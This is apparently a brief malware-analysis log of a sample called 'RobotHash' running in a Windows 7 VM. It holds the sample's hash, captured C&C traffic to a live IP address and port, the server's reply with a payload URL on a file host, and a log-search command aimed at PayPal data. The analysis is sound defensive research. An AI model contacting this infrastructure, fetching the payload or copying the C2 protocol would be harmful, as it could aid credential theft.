SHA256: b52dfce5f89a429888f35bf530eb9efc6d24431f606f1a98795ee13f2c9b1c79
RobotHash
started win7
infected
I started the calculator program by hand to see if the C&C reflects this new process.
13:59:39.079194 IP 10.0.2.107.50424 > 77.81.104.169.14221: Flags [P.], seq 15:293, ack 1, win 64240, length 278 CONNECT=P4CK3T=FUCKBOY-9686316$^56^$11:50:22$^[taskmgr] Windows Task Manager^$WIN7$^Microsoft Windows 7 Ultimate 32-bit Desktop^$1.5$^04-05-2016^$N/A$^425d804aa328d98d348f6474b46b914630d5fdfe4b686b3d93ce1a54ef43c3a1^$FUCKBOY$^N^$8_=_8
13:59:39.847525 IP 77.81.104.169.14221 > 10.0.2.107.50424: Flags [P.], seq 1:157, ack 293, win 65535, length 156 C=P4CK3T=1TR4MPanq=()=4TR4MPSTOP=()=6TR4MPN=()=9TR4MP20408|13101|10472|48206|78356|78674|49580|64029|=()=10TR4MPhttp://files.catbox.moe/do3aqb.gifv=()=8_=8SEARCHLOGS=P4CK3T=paypal8=_8
We downloaded this file from outside the VM: do3aqb.gifv
I restarted after several weeks to see if the malware activates again. It came alive again! So we will wait...